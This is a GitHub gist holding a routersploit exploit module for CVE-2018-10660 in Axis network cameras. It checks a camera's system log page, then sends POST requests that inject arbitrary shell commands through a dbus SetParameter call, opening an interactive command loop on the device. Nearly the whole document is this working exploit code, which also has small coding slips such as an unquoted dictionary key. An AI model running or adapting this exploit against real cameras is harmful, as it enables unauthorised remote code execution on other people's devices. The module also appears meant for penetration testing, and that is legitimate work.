Last active
March 14, 2023 19:56
-
-
Save paralax/a5d25f7dc83712e3d48daf57506b8635 to your computer and use it in GitHub Desktop.
routersploit module exploits/cameras/axis/network_camera_rce.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import random | |
| import re | |
| import string | |
| from routersploit.core.exploit import * | |
| from routersploit.core.http.http_client import HTTPClient | |
| class Exploit(HTTPClient): | |
| __info__ = { | |
| "name": "Axis Network Camera RCE", | |
| "description": "A shell command injection vulnerability exists in the parhand handler, enabling arbitrary code execution.", | |
| "authors": ( | |
| 'Or Peles', # Vulnerability discovery (VDOO) | |
| 'wvu', # Metasploit module | |
| 'sinn3r', # Metasploit module | |
| 'Brent Cook', # Metasploit module | |
| 'Jacob Robles', # Metasploit module | |
| 'Matthew Kienow', # Metasploit module | |
| 'Shelby Pace', # Metasploit module | |
| 'Chris Lee', # Metasploit module | |
| 'Cale Black', # Metasploit module | |
| "@jnazario", # routersploit module | |
| ), | |
| "references": ( | |
| "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10660", | |
| "https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras", | |
| "https://www.exploit-db.com/exploits/45100/", | |
| ), | |
| "devices": ( | |
| "Axis Network Camera", | |
| ) | |
| } | |
| target = OptIP("", "Target IPv4 or IPv6 address") | |
| port = OptPort(80, "Target HTTP port") | |
| def run(self): | |
| if self.check(): | |
| print_success("Target appears to be vulnerable") | |
| print_status("Invoking command loop...") | |
| shell(self) | |
| else: | |
| print_error("Target is not vulnerable") | |
| def execute(self, cmd): | |
| rand_srv = ''.join([ random.choice(string.letters + string.digits) for _ in range(random.randint(8,42))]) | |
| payload = {'action': 'dbus', | |
| args: self._dbus_send('set_param', | |
| "string:root.Time.DST.Enabled string:;{};".format(cmd))} | |
| response = self.http_request( | |
| method='POST', | |
| path='/index.html/{}'.format(rand_srv), | |
| data=payload | |
| ) | |
| payload = {'action': 'dbus', | |
| 'args': self._dbus_send('synch_params')} | |
| response = self.http_request( | |
| method='POST', | |
| path='/index.html/{}'.format(rand_srv), | |
| data=payload | |
| ) | |
| return response.text | |
| def _dbus_send(self, method, param=None): | |
| args = '--system --dest=com.axis.PolicyKitParhand ' \ | |
| '--type=method_call /com/axis/PolicyKitParhand ' | |
| if method == 'set_param': | |
| args += "com.axis.PolicyKitParhand.SetParameter {}".format(param) | |
| elif method == 'synch_params': | |
| args += 'com.axis.PolicyKitParhand.SynchParameters' | |
| return args | |
| @mute | |
| def check(self): | |
| response = self.http_request( | |
| method="GET", | |
| path="/axis-cgi/admin/systemlog.cgi" | |
| ) | |
| if response is not None: | |
| if re.match('<TITLE>AXIS .*Network Camera</TITLE>', response.text): | |
| return True # target is vulnerable | |
| return False # target is not vulnerable | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment